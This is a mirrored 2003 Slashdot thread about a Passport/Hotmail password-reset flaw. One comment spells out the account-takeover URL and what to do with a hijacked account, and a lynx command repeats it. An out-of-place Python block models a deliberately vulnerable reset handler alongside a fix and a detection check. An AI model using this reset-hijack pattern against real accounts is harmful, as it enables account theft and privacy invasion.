Slashdot Mirror


Security Vulnerability in Microsoft .NET Passport

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

101 of 433 comments

  1. Remember... by stu_coates · · Score: 5, Funny

    Remember folks, this is Trustworthy Computing! ;-)

    1. Re:Remember... by Anonymous Coward · · Score: 5, Informative

      According to a Dutch news site this hole was fixed shortly after the posting... So that's the way to talk to Microsoft.....

      nu.nl for people who know how to read Dutch (no, NOT German)..

    2. Re:Remember... by rf0 · · Score: 3, Funny

      I wouldn't trust them to feed my fish.

      Rus

    3. Re:Remember... by ctellefsen · · Score: 5, Insightful

      It's a good thing that (according to M$ ads) the hacker is an endangered species, so that there is no one around to exploit this exploit.

      Current score: XBox is hacked, Passport is insecure, SQL Server is beset by worms, and I won't even mention all the holes found over the years in IE and Outlook.

      Welcome to the age of untrustworthy computing...

    4. Re:Remember... by Gortbusters.org · · Score: 5, Funny

      That's one degree of difference with .NET!

      --
      --------
      Free your mind.
    5. Re:Remember... by m00nun1t · · Score: 4, Informative

      I fully agree this passport problem is a lame & inexcusable fault that should never, ever have happened.

      However, can you please stop dragging trustworthy computing into this? Bill Gates has said many times that the increased focus on security is for new products, not retrospectively fixing existing products.

      The only product that is really valid to criticise under the trustworthy computing tag is Windows Server 2003 - if that has big problems, then trustworthy computing has failed. But don't drag up old products/services.

    6. Re:Remember... by jkrise · · Score: 4, Funny

      " according to a dutch news site this hole was fixed shortly after the posting... "

      If sending 404 Page Not Found messages to users trying to update passwords can be called fixing, well, MS indeed fixed it.

      --
      If you keep throwing chairs, one day you'll break windows....
    7. Re:Remember... by beuges · · Score: 2, Insightful

      So does that mean they can get away with ignoring bugs in software that can expose personal details and credit card numbers to anyone?

      I think that if they were aware of the problem (and they were, apparently the finder mailed them 10 times), chose not to fix it, and some poor person had their credit card number exposed and abused, then Microsoft should be taken to the cleaners. Online security is something that must constantly be looked at, and maintained and updated. It's for their own good, really - if they don't fix it, they'll end up the dumbasses, cos people will lose their trust in the Passport system, and use other means for online transactions.

    8. Re:Remember... by mbourgon · · Score: 4, Funny

      MS has admitted that Trustworthy Computing has nothing to do with security. It's all about whether you trust Microsoft. Do you trust them enough to give them money? If so, they've met their goals.

      --
      "Sometimes a woman is a kind of religion, she can save your soul & set you free from all your sins" - Bad Examples
    9. Re:Remember... by frankthechicken · · Score: 2, Informative

      I don't know, this still seems to work.

    10. Re:Remember... by ConceptJunkie · · Score: 5, Insightful

      Why should Microsoft be "taken to the cleaners", when their EULAs state that any similarity between the software they sell and what they claim they are selling is purely coincidental?

      See Microsoft has this liability thing all sewn up. All they have to do is "Just trust us." and then in the fine print it says "But if we screw up, you can't hold us responsible."

      They want it both ways, and they seem to have gotten it.

      --
      You are in a maze of twisty little passages, all alike.
    11. Re:Remember... by ConceptJunkie · · Score: 4, Interesting

      But where's the public outrage?

      We on /. regularly vent our spleens (including me, and I'm a Microsoft user myself) about this blatantly bad situation, but Microsoft continues to prevail, and except for the occasional story, there really seems to be no negative impact on their business (much of which seems to be spinning their abysmal record in "trustworthiness").

      Hackers are only an endangered species because it hardly takes a hacker to break MS code these days.

      --
      You are in a maze of twisty little passages, all alike.
    12. Re:Remember... by Reziac · · Score: 3, Informative

      Not fixed -- per the articles (which, sadly, I did read) they just shut down the function that allows users to change their password.

      --
      ~REZ~ #43301. Who'd fake being me anyway?
    13. Re:Remember... by EvilTwinSkippy · · Score: 2, Insightful
      Hackers are only an endangered species because it hardly takes a hacker to break MS code these days.

      I think the theory is, that by having so much low-hanging fruit, M$ is hoping that the next generation of hackers will be as complacent as the present user base.

      Well, at least take the shine off of 0w#!n@ a system. It used to be a challenge. Now it's just annoying.

      --
      "Learning is not compulsory... neither is survival."
      --Dr.W.Edwards Deming
  2. Oh my God (Mad scramble) by LookSharp · · Score: 5, Funny

    Ahhh! I have to go change my Passport profile and take out all those credit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

    Why did I trust Microsoft with all of my personal secrets? They've had such great security in the past... /obvious

    1. Re:Oh my God (Mad scramble) by Anonymous Coward · · Score: 5, Funny

      I have to go change my Passport profile and take out all those credit cards I added, and transport those top-secret, mission critical emails and documents I have sitting in my Hotmail account!

      Don't bother, I just did it for you.

    2. Re:Oh my God (Mad scramble) by twelveinchbrain · · Score: 2, Interesting

      I know you're being sarcastic, but if I'm not mistaken, MSN subscribers also sign in with Passport. This would mean that anyone who happened to use MSN as their ISP can have their personal information stolen. It's not so unreasonable for a person to expect their private, personal emails to remain private.

      --
      Not Found
      The requested URL /signature.html was not found on this server.
    3. Re:Oh my God (Mad scramble) by kharchenko · · Score: 2, Interesting

      I remember reading notes of some poor fellow who was involved in trying to get MS to fix some hotmail backdoor a while ago. Even though he wasn't in any way responsible for finding the hack, years on end he received e-mails like this:

      Dear Xxxx,
      It's terribly important for me to hack into an account of Yyyy !
      Please understand, she's my girlfriend, and I think she might be cheating on me.
      Please tell me how to do this ... please, please ...


      Now every time I read about another hotmail hack, I can't help but think how many ticklish revelations will happen today :)

  3. As lame as it sounds... by Anonymous Coward · · Score: 5, Funny

    ...This could be a good thing for me. Back in the day, I had a really cool hotmail address, but I neglected it for a while and completely forgot the password. Since all my info was fake, I couldn't request a new password. Off to steal my own account....

  4. 404 error by uberdood · · Score: 2, Informative

    Er, already fixed. I get a 404 error when I go there (with appropriate e-mail addresses).

    --
    "Population 1,656"
    1. Re:404 error by jlanng · · Score: 2, Insightful

      It returns an HTTP status of 404, so it is a proper 404

  5. Security flaw in Passport!!!! by grahamlee · · Score: 5, Funny

    In other news, the world is round, Bill Gates is rich, twice two is four, and the England cricket team haven't won anything.

    1. Re:Security flaw in Passport!!!! by jkrise · · Score: 2, Funny

      "the England cricket team haven't won anything"

      I thought they won a moral victory by not travelling to Zimbabwe... and a political victory by making Zim fly to England. Bad example?

      --
      If you keep throwing chairs, one day you'll break windows....
    2. Re:Security flaw in Passport!!!! by rifter · · Score: 3, Funny

      twice two is four

      It seems you are overdue for your appointment at miniluv, thought criminal!

  6. Oh no, not again... by girl_geek_antinomy · · Score: 5, Insightful

    The depressing thing is, it's such a simple exploit...

    Oh dear. When are people going to start *thinking* before they add usability features to web services willy-nilly...? Hopefully at least the fact that this is so high-profile will make others think hard about their own password-resetting systems.

    When I was working on an e-commerce site, I remember us all sitting around spending literally hours plotting out exactly what who would be able to do what with it. It's just common sense, surely?

  7. A legitimate use? by Gleeb · · Score: 2, Informative

    Thank the lord for POP ;)

  8. The Microsoft Information Minster Says: by retards · · Score: 5, Funny

    We are secure! There are no security issues in our code. Truly. We shall beat Linux with our shoes and call it a donkey!

  9. now be fair by Joe+the+Lesser · · Score: 4, Funny

    unsuccessful attempts to contact Microsoft.

    It's not their fault Outlook kept crashing, right?

    --
    "I only speak the truth"
    Karma: null(Mostly affected by an unassigned variable)
  10. Ruh Roh Raggy by Ralph+Wiggam · · Score: 4, Funny

    Holy Crap!

    If someone were to break into my Hotmail account they would find out all the secret ways that I make my penis and breasts larger.

    With .NET, there's only one degree of separation between me and evil crackers.

    -B

    1. Re:Ruh Roh Raggy by archen · · Score: 5, Funny

      If you have a penis AND breasts (and feel the need to enlarge them) you probably really do have a lot of secrets...

  11. good by Nevrar · · Score: 5, Funny

    "...the victim's accounts..."

    It's nice to see people are finally realising that Passport/Hotmail users are victims. ;)

    --
    Nevrar
  12. Oh no by Rik+Sweeney · · Score: 5, Funny

    A remote user can change an arbitrary target user's password to an arbitrary value and then access the target user's account

    But that spam is personal to me. It's not for anyone else.

  13. Can someone explain this? by jkrise · · Score: 5, Insightful

    "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. "

    I fail to u'stand what Microsoft .NET Passport means. I only know Hotmail said:
    In 1999: Login to Hotmail
    In 2000: Login to Passport
    2001 and later: Login to .Net

    Nobody seems to know what the hell .Net is all about (including MS). Visual Studio .Net is the only branded .Net product out there, and Hotmail is supposed to be on .Net, whatever that means.

    Is Passport or Passport.Net used by any other service except Hotmail? Terribly confusing.

    --
    If you keep throwing chairs, one day you'll break windows....
    1. Re:Can someone explain this? by Anonymous Coward · · Score: 5, Funny

      I believe that .NET was the cause of the .COM crash. The shit hit the fan around the same time. What a catalyst !

    2. Re:Can someone explain this? by Kredal · · Score: 2, Funny

      So if I start the .ORG service, can I kill the .NET system?

      So who wants to join the .ORG at my place next friday? (:

      --
      Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
    3. Re:Can someone explain this? by Schnapple · · Score: 2, Informative
      I'm going to use this opportunity to blatantly plug an article I wrote on this topic on what .NET is and what .NET isn't. And yes that's a Tripod link, so turn on your popup blockers.

      But the short answer to your question is that yes, the overkill of .NET branding has muddied and confused the perception of what .NET is. But hey, everyone in the world knows the name, so mission accomplished?

  14. Nice going, MS. by Renraku · · Score: 4, Interesting

    Too bad this was caused by a blatant underestimation of the power of curious users. If I had ever used the feature, I would have picked it up instantly.

    --
    Job? I don't have time to get a job! Who will sit around and bitch about being broke and unemployed then?
  15. Re:FUD by girl_geek_antinomy · · Score: 3, Insightful

    Instead if you're a legitimate user who's forgotten their password you're now f*cked. *sigh*. Nice to know things have improved then...

  16. Finally... by rf0 · · Score: 2, Funny

    All those l33t hax0rs can now stop asking how to hack hotmail. The answer's right here (if it wasn't 404'd)

    Rus

  17. Well, at least now I know... by johannesg · · Score: 5, Funny
    ...where I don't want to go today.

    Perhaps we can take this opportunity to kill all those spam accounts on hotmail. All we need to do is reset all the passwords to impossible strings...

  18. Really tough fix by alteridem · · Score: 2, Funny

    Sounds like a really tough fix... Delete the offending page... "There, see, it's secure."

  19. This should encourage anti-DRM folks by hrbrmstr · · Score: 5, Insightful

    While most geeks take at least some "delight" in vulnerabilities (even outside M$ vulnerabilities), the fact that we keep seeing stupid programmer tricks from M$ employees should be a comforting factor to DRM detractors. Even if M$ manages to get DRM out there, how riddled with holes will it be? If it is constantly circumvented, does anyone think suppliers will use it (DMCA-type laws notwithstanding)?

    And with this being a web-"exploit", it makes the DRM-circumvention idea more interesting since all of the verification will be done online.

    Constant vulnerabilities == no real DRM.

    --
    Mind the gap...
    1. Re:This should encourage anti-DRM folks by Bob9113 · · Score: 4, Insightful

      Even if M$ manages to get DRM out there, how riddled with holes will it be?

      The problem is not whether it works - we all know that DRM is technically impossible (analog hole). The problem is that combined with the DMCA, DRM makes fair use illegal. If Passport were being used for copyright protection, it would be a federal crime to report this security vulnerability.

  20. Re:FUD by markov_chain · · Score: 3, Insightful

    Sure, *this one* is fixed, but it sure doesn't inspire confidence in the security of their service. Who knows if there are other holes left for crackers to exploit...

    --
    Tsunami -- You can't bring a good wave down!
  21. Jokes aside... by ParnBR · · Score: 5, Interesting

    Sooner or later they'll start blaming users for providing personal information, and excusing websites and companies from security flaws.

    --
    My neighbor's .sig is better than mine.
  22. Whoever has got... by archetypeone · · Score: 5, Funny

    victim@hotmail.com or attacker@attacker.com is going to be really pissed...

  23. What do people expect? by Anonymous Coward · · Score: 4, Interesting

    You expect security from a company with one of the worst track records in the industry? Ha!
    The problem with Microsoft (and the majority of other IT firms) is that there is no PROACTIVE auditing. I think that every company should conduct OpenBSD-style code audits before they release software. This would cut down dramatically on the number of incidents like this.

    1. Re:What do people expect? by PerryMason · · Score: 4, Insightful

      The problem with proactive auditing is that it takes time, and as we all know, time is money. Personally I think it's harsh to put the blame on the coders as I've been involved in alpha and beta testing quite a few apps over the years and almost without exception, the bean counters force the release of a product before the coders are happy with it.

      Typically the bean counters want the cash rolling in as soon as possible on a new product (as they've seen nothing but a cash outflow) and in the software industry, they know that bugs are both inevitable, and unfortunately, for the most part, accepted so they're happy to release an incomplete product knowing that it won't stop people buying it. We won't see substantially bug-free code until software developers are held to the same standards of product reliability that we see in just about every other industry. Until then, there really isn't any reason to thoroughly audit your code. Just release it buggy as all hell and release Service Packs and Hotfixes. It works for the biggest software company on earth, so why shouldn't it for anyone else?

      --
      "I'm tired of all this 'Aren't humanity great' bullshit. We're a virus with shoes" - Bill Hicks
  24. Flawed concept by YrWrstNtmr · · Score: 2, Insightful

    And eventually, we will see a similar exploit on Sun's Liberty system as well.

    The whole single sign on concept is flawed at present. Far too many potential holes, no matter what the tool, or who the builder.

    1. Re:Flawed concept by Zathrus · · Score: 3, Interesting

      And eventually, we will see a similar exploit on Sun's Liberty system as well.

      While we will undoubtedly see exploits on any system large enough to attract interest, I don't think Sun would code something this brain-dead stupid.

      The industry standard is to ask for a passphrase when you forget your password. MS didn't even do this. I'm still wondering what junior level coder came up with this one though... I can't even express how stupid this is.

      The whole single sign on concept is flawed at present. Far too many potential holes, no matter what the tool, or who the builder.

      So we work to make it better... abandoning the concept entirely isn't going to happen. It's a worthwhile concept IMO, and while there are a lot of issues to be worked out that's not to say that they can't be. Most people would be willing to use a "strong" password if they only had to remember one. When you have to remember a dozen then forget it - the vast majority of people are going to use something like "password" or an easily guessable word from their personal life. Remembering "df783N:pa04uYG" and another dozen variants just isn't going to happen.

  25. Re:FUD by Anonymous Coward · · Score: 3, Insightful

    Fixed? They disabled resetting of passwords... that is a quick hack to stop the bleeding, but it does not get around the real issue of poor design. Is it that hard to actually think about what kind of input can come in a query string, and what should be done with it? Aren't they supposed to be professionals? I learned about this in a CS course, and I couldn't help thinking, "duh, any sensible person wouldn't be that stupid..." Obviously I was wrong.

  26. Re:FUD by CowboyBob500 · · Score: 5, Insightful

    Fixed does not mean simply 404ing the offending page. There are many legitimate users now who cannot change their passwords. This is a cheap hack while they work out what the fsck to do about the real problem.

    Bob

  27. Try stealing billgates@hotmail.com by jkrise · · Score: 2, Funny

    You could freak out with all his credit cards! Assuming he's got a good credit rating though :-(

    --
    If you keep throwing chairs, one day you'll break windows....
    1. Re:Try stealing billgates@hotmail.com by rf0 · · Score: 3, Funny

      or just go for abuse@hotmail.com.

      Rus

    2. Re:Try stealing billgates@hotmail.com by Anonymous Coward · · Score: 3, Funny

      That reminds me of the time I and a friend noticed a free mail provider that had forgotten to reserve certain interesting (to say the least) addresses.

      I got webmaster@... and I believe my friend got administrator@...

      I don't know if my friend got any mail, but I got a lot of interesting messages until I got bored and stopped checking it :-)

      Now, before any of you start bashing me for being irresponsible, I did try to help out the users who sent me mail. Mostly I just told them who to really contact.

      I did get carried away a couple of times though. Once I decided to reply to a spam complaint and thanked them for the nice porn links they forwarded to me. They never responded, funny thing.

      (this posted anonymously for obvious reasons)

  28. How do you contact Microsoft? by Albanach · · Score: 5, Interesting
    This raises an interesting question about how, exactly, you are supposed to notify Microsoft by email.

    Microsoft make an interesting interpretation of RFCs by accepting all mail to postmaster@ but only insofar as to send an automatic response saying your message will not be read.

    This guy also says he tried to email them ten times and never got further than automagic autoreplies. Do they actually have a procedure to inform them when things are broken?

    1. Re:How do you contact Microsoft? by Anonymous Coward · · Score: 2, Informative

      Yes, it's called posting on slashdot, silly!

    2. Re:How do you contact Microsoft? by PerryMason · · Score: 4, Funny

      Do they actually have a procedure to inform them when things are broken?

      As far as I'm aware, they have a guy who just keeps clicking reload on the /. front page waiting for a new MS vulnerability story to pop up. They tried the same thing with Bugtraq but there were just way too many vulnerabilities for the poor guy to keep up.

      --
      "I'm tired of all this 'Aren't humanity great' bullshit. We're a virus with shoes" - Bill Hicks
    3. Re:How do you contact Microsoft? by Quixote · · Score: 2, Informative
      I don't know about you guys, but I just got this from my buddy Steve Ballmer today:

      From SteveBallmer@ceo.microsoft.com Thu May 08 01:26:33 2003
      Return-Path: <SteveBallmer@ceo.microsoft.com>
      Delivered-To: unknown@somewhere.com
      Received: (qmail 8935 invoked from network); 8 May 2003 01:26:32 -0000
      Received: from unknown (HELO delivery.pens.microsoft.com) (207.46.248.68)
      by xxxxxxxxxxxx with SMTP; 8 May 2003 01:26:12 -0000
      Received: from TK2MSFTDDSQ04 ([10.40.1.68]) by delivery.pens.microsoft.com with
      Microsoft SMTPSVC(5.0.2195.5600);
      Wed, 7 May 2003 18:21:11 -0700
      Reply-To: "Steve Ballmer" <GUID-DELETED-@ceo.microsoft.com>
      From: "Steve Ballmer" <SteveBallmer@ceo.microsoft.com>
      To: <unknown@somewhere.com>
      Subject: Rights Management: Enabling New Opportunities for Customers
      Date: Wed, 7 May 2003 18:24:10 -0700
      Message-ID: <37337373373733737337xxxx@phx.gbl>
      MIME-Version: 1.0
      Content-Type: text/plain;
      charset="iso-8859-1"
      Content-Transfer-Encoding: quoted-printable
      X-Mailer: Microsoft CDO for Windows 2000
      Content-Class: urn:content-classes:message
      X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
      Return-Path: SteveBallmer@ceo.microsoft.com
      X-OriginalArrivalTime: 08 May 2003 01:20:07.0109 (UTC)
      FILETIME=[DEADBEEF:3MTA3]
      Status: RO
      Content-Length: 11377
      Lines: 206

      May 7, 2003

      I'm writing to you today about a set of emerging technologies that hold great
      promise for enhancing privacy and enabling important new uses for computers and other digital devices. Before I share my thoughts about this in more detail, I want to explain why you're receiving this email.

      So, in case you guys need to contact Steve, you have his email address now!

  29. The Damage Has Been Done by TubeSteak · · Score: 5, Insightful
    "Passport accounts are central repositories for a person's online data and can include personal information such as birthdays and credit card numbers as well as acting as the single key for the customer's online accounts."

    It's kind of important to remember that this exploit has been out in the wild for a loooooong time. I can imagine Danka is going to have a lot of pissed off h4x0rs who are going to want their exploit back.

    ~would this be the prime example of a security hole being called a feature?~

    --
    [Fuck Beta]
    o0t!
    1. Re:The Damage Has Been Done by Anonymous+Struct · · Score: 2, Interesting

      Not to mention the real damage -- solid evidence that no matter how many assurances Microsoft gives you that your data is safe and they've taken all precautions, you simply cannot trust them with important personal data. How many times does your bank have to 'whoops' a $1500 deposit before you decide that it's just not acceptable to do business with them? Once is usually enough.

      Having your website defaced is one thing, and having a day-long network headache because of the most recent worm is one thing, but losing sensitive personal data is quite another. Based on their track record, Microsoft is simply not qualified to step into the role of holding and protecting important personal information, and this exploit makes that abundantly clear.

      To be fair, maybe nobody is qualified to step into that role right now, but Microsoft's release-now fix-later approach to software development has no place in an environment where there's so much at stake.

  30. Re: Procedure to inform them it's broken. by zakezuke · · Score: 5, Interesting

    There is an outlined procedure for this sorta thing...

    In the event a user discovers an exploit, inform user to reboot machine and it will go away.

    But seriously, there seems to be no OFFICIAL way for end users to actually contact Microsoft, nor any sorta automated system to rank e-mails based on importance, nor any human within the phone network who actually knows who to talk to. People I've known that worked there also have no clue as far as who to talk to, and admit this if you're lucky. If you are unlucky, they just say it's a vendor issue without thinking that the vendor is Microsoft.

    --
    There is no sanctuary. There is no sanctuary. SHUT UP! There is no shut up. There is no shut up.
  31. thoughts by unborracho · · Score: 2, Interesting

    Since the report wasn't very descriptive, I was hoping someone could enlighten me. I would assume that since they don't ask you to provide your old password to change it, this is a method for users who forgot their old password to get it reset to some random password that Microsoft gave, and have it sent to an email that the user provided from the website.

    So couldn't Microsoft simply fix this by having the email sent to the person's email address they provided when they registered with .NET? (assuming it's non-hotmail)

    --
    "You had this look that of an angel, it was such a bad disguise" --Dishwalla
    1. Re:thoughts by Kredal · · Score: 5, Informative

      Since it's been 404'd, I'll provide it here.

      If you went to:

      https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

      and replaced the victim address with a real user, and the attacker@attacker.com with your address, they would send you an email telling you to click on another link, and you could set your own password. Voilà, you now have rights to that hotmail account so you can read their mail, look at their buddy list, safely spam people, buy stuff (if they have their credit card saved), etc etc etc... Real fun stuff.

      --
      Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
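The reset flow Kredal describes, modelled as an added example written for this page (it is not Passport's code): a handler that honours the client-supplied `prefem` destination, beside a hardened handler that mails only the recovery address on file, binds the token to the account, and a log check that flags reset requests naming a different destination. Only the parameter names (`em`, `prefem`, `rst`, `lc`) come from the quoted URL; the account store, token format and function names are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlsplit

# Constructed sample data (not real accounts): account -> recovery address on file.
ACCOUNTS = {
    "victim@hotmail.com": {"recovery_email": "victim-recovery@example.org",
                           "password": "old-password"},
}
# Server-side store of outstanding reset tokens: account -> (sha256(token), expiry).
PENDING = {}
TOKEN_TTL = 15 * 60  # seconds


def parse_reset_request(url):
    """Return the query parameters of a reset URL as a flat dict (first value wins)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def issue_token(account, now=None):
    """Create a single-use reset token bound to one account; only its hash is stored."""
    token = secrets.token_urlsafe(32)
    digest = hashlib.sha256(token.encode()).hexdigest()
    PENDING[account] = (digest, (now if now is not None else time.time()) + TOKEN_TTL)
    return token


def vulnerable_reset(url, outbox):
    """The pattern the thread describes: the reset link for 'em' is mailed to
    whatever 'prefem' address the client put in the query string."""
    p = parse_reset_request(url)
    account = p.get("em", "")
    if account not in ACCOUNTS:
        return None
    dest = p.get("prefem") or ACCOUNTS[account]["recovery_email"]
    outbox.append((dest, account, issue_token(account)))
    return dest


def hardened_reset(url, outbox):
    """Hardened form: ignore any client-supplied destination, mail only the recovery
    address on file, and answer identically whether or not the account exists."""
    p = parse_reset_request(url)
    account = p.get("em", "")
    rec = ACCOUNTS.get(account)
    if rec is not None:
        outbox.append((rec["recovery_email"], account, issue_token(account)))
    return "If that account exists, a reset link was sent to its recovery address."


def redeem_token(account, token, new_password, now=None):
    """Accept the new password only if the token is the one issued for this exact
    account and has not expired; the token is consumed on success."""
    entry = PENDING.get(account)
    if entry is None:
        return False
    digest, expiry = entry
    presented = hashlib.sha256(token.encode()).hexdigest()
    current = now if now is not None else time.time()
    if current > expiry or not hmac.compare_digest(digest, presented):
        return False
    del PENDING[account]
    ACCOUNTS[account]["password"] = new_password
    return True


def suspicious_reset_request(url):
    """Detection check for request logs: a reset request that names a delivery
    address different from the account being reset is the pattern to alert on."""
    p = parse_reset_request(url)
    em, prefem = p.get("em", ""), p.get("prefem", "")
    return bool(prefem) and prefem.lower() != em.lower()


# The URL quoted in the thread (both addresses are the thread's own placeholders).
THREAD_URL = ("https://register.passport.net/emailpwdreset.srf?lc=1033"
              "&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1")

if __name__ == "__main__":
    sent = []
    print("vulnerable handler mails:", vulnerable_reset(THREAD_URL, sent))
    sent.clear()
    hardened_reset(THREAD_URL, sent)
    print("hardened handler mails:", sent[0][0])
    print("flagged in logs:", suspicious_reset_request(THREAD_URL))
```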
  32. 404 by Richard_J_M · · Score: 2, Informative

    The vulnerability seems to return a 404 - so it seems hotmail have taken notice after all - even though it took a /. to make them notice.

  33. Add one to the pile by Ashyukun · · Score: 5, Funny

    Yet another reason to be glad I ditched my Hotmail account and refuse to use Passport after Hotmail 'politely' informed me that my last name (the one I was born with) violated their offensive language filter and asked me to change my last name.

    1. Re:Add one to the pile by FauxPasIII · · Score: 3, Funny

      I think I speak for everyone here when I ask... What's your last name?!

      --
      25% Funny, 25% Insightful, 25% Informative, 25% Troll
    2. Re:Add one to the pile by dubstop · · Score: 5, Funny

      That's how it starts.

      In fifty years time, when Microsoft are in charge of the planet, they won't be asking you to change your last name, they'll be telling you that they've already changed your entire name to a 256-character, globally unique identifier. For your convenience, of course, and at a very reasonable fee of M$50 (MicroSerfian dollaroonies), which, again for your convenience, they've already deducted from your (compulsory) Bank of Microsoft account. As a result of this unexpected deduction, your account will go M$1 overdrawn, and this will mean that they are entitled to immediate vacant possession of your home. When you query this, it will be pointed out that this entitlement was clearly detailed in 2-point font, on page 437 (that's about one-third of the way in) of the click-through agreement that you read, understood, and click-through-agreed to when opening your (compulsory) Bank of Microsoft account. At the time that this is pointed out, your attention will be drawn to the clause on page 442 that they are also entitled to one of every major organ that you have two of. This includes (but is not limited to) your lungs, kidneys and, at the discretion of the Microsoft legal department (formerly known as the US Department of Justice), your testicles. They will gladly help you to pay for the operation to remove these organs, by the extension of a small loan, repayable in 7200 monthly payments that, for your convenience, will exactly match your monthly salary. You will be responsible for the shipping of at least two of your children to the secure holding facility at Redmond, where they will be held as collateral for the duration of the loan.

      Where do you want to go today?

    3. Re:Add one to the pile by pcardoso · · Score: 3, Funny

      Funny... I just had the same problem while registering a hotmail account for my girlfriend to use, so we could IM each other... most of our contacts are MSN addresses, so Windows Messenger was the best choice. I don't like it that much, but what the hell! Gaim has no problems with that..

      Back to the topic, her name is Ana Luisa and guess what happens when you concatenate her first two names together! It was getting on my nerves to receive an error message because of some issue with the username (but not an existing username, oddly)... It was only after a lot of attempts that I noticed the first 4 chars of the username... Added an underscore and it was all ok...

  34. RTFA by Anonymous Coward · · Score: 2, Informative

    secure@microsoft.com

  35. I agree completely. by @madeus · · Score: 5, Insightful

    I agree completely.

    I spent a year on contract developing a product, web based (on Unix), which allowed users and managers to spend budgets as allocated by management in real time, and I spent 3 doing just planning and developing the auth system (as it has company/office/team/user levels (user@team.office.company for the username) it was admittedly a little more complex than your average auth system).

    In the end the system has a really solid auth system: everything is authenticated, and when you try to actually make a transaction there is a multi-tiered system that checks budget approval at user, office, team and company level.

    It required mind-numbing discussions again and again to get it done but it was resolved in the end. I'm glad the project's over though; repeatedly explaining why it was necessary to take a long and stable and secure approach (rather than a quick hack approach) to non-technical people is very draining (their simple approach, though they wouldn't admit it if you asked them, was actually 'hack it together as quickly as possible', which is what a lot of competitors had done, which is why they had such poor systems, which is why this company was started).

    I utterly, utterly despair when I see CGI scripts that don't have a decent authentication mechanism. With rare exception (along the lines of everybody makes mistakes) it's just incompetence; there are simply people out there who really should not design or implement systems or write software (even CGIs).

    I am a big fan of the slow, methodical, planned, discussed and documented approach to development.

    The previous exploits for Hotmail were poor, but I recall that at least one of them was due to an error that I can empathise with to some extent (it wasn't as blatant), but I am stunned at the level of ineptitude shown by this particular exploit, but I know the same stupid mistakes are repeated all over the place...

  36. Funny stuff by Anonymous Coward · · Score: 2, Funny

    From the passport.net page, in a big green box, under the title "SECURITY", it reads:

    Sign in on any computer that has Internet access. .NET Passport uses powerful online security technology and follows a comprehensive privacy policy to help protect your profile information. You manage your information-sharing options.

  37. Re:FUD by aug24 · · Score: 2, Redundant

    Let's start with the observation that it isn't fixed. All they've done is turn off the password change routines at the back end...!

    Personally I suggest everyone reading this makes sure to tell everyone they know, in order to stop people blindly trusting any incompetents. The fact that it's MS just makes the schadenfreude better.

    Justin.

    --
    You're only jealous cos the little penguins are talking to me.
  38. Re:FUD by CrazyJ020 · · Score: 2, Interesting

    This security vulnerability, and the accompanying quick fix, seem to actually enforce Microsoft's touted concept of centralized computing and services.

    Think about it, with a company like Microsoft, there is no doubt vulnerabilities will exist. If this was a distributed product we would still have script kiddies years from now drilling on this exploit. Now that it is a centralized service, it has been fixed in one place before any substantial damage has been done. -- Which evil do you want today?

  39. MS-Passport and those that cannot/willnot read by SgtChaireBourne · · Score: 5, Informative

    MS-Passport has long been known to be impossible to secure, even in theory: See Risks of the Passport Single Signon Protocol. Even the FTC charged Microsoft with deceptive advertising in regards to MS-Passport. Other governments are not getting caught with their mouth open either. Standards body forced Redmond to pull 'unsubstantiated and misleading' advertisement

    There really does seem to be no difference between someone who cannot read and someone who does not. Those that can read wouldn't be caught using MS-Passport. Sadly, signal can be drowned out by noise coming from a colossal marketing blitz to last through September.

    We'll see if they last that long. Windows2003 seems to be more of a push to get users over to OS X or Linux. Their other (2nd of 2) cash cow, the new MS-Office has already been postponed and seems to be more of an incentive to move to OpenOffice than to upgrade.

    --
    Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
  40. This is not new by johnatjohnytech · · Score: 5, Informative

    This is not a new thing, this has been around for a while.

    It is about time somebody tried to bring this to light. But I really doubt he "discovered" something that has been known about for a while.

    Don't believe me? Do a search on Kazaa for hotmail passwords. You will find several txt/doc's with these or similar instructions.

  41. What breed of idiot are you? by gazbo · · Score: 5, Informative

    So it isn't a standard IIS 404. That is wrong how? Let me put it another way:
    lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1'

    HTTP/1.1 404 Not Found
    Server: Microsoft-IIS/5.0
    Date: Thu, 08 May 2003 13:10:14 GMT
    PPServer: H: LAWPPREGU4A002
    It's a 404. It returns a 404 code. It says it's a 404 on the page. Just because you understand so little of the HTTP protocol that you think 404 means "displays apache logo" doesn't make MS wrong.
    1. Re:What breed of idiot are you? by Dark+Lord+Seth · · Score: 2, Funny

      lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1'

      HTTP/1.1 404 Not Found
      Server: Apache/2.0.43 (Unix)
      Date: Thu, 08 May 2003 13:10:14 GMT
      PPServer: H: LAWPPREGU4A002

      This would be a lot more fun to see though...

  42. Re: Procedure to inform them it's broken. by Zak3056 · · Score: 4, Interesting

    But seriously, there seems to be no OFFICIAL way for end users to actually contact microsoft, nor any sorta automated system to rank e-mails based on importance, nor any human within the phone network who actually knows who to talk to.

    Tell me about it. When IE5 first came out (with the modular installer) the installer had a nasty bug: If the FTP site it tried to connect to to download a CAB was full, it would create the CAB file which would contain no data, only the error message!

    As one might expect, this would cause the installation to bomb, and no explanation would be given to the user. Attempting to resume the installation would also fail. The solution was, of course, to go into the installer's temp directory and delete the bad CAB files and re-download them, but most users wouldn't know where to find them, and would be forced to start from scratch.

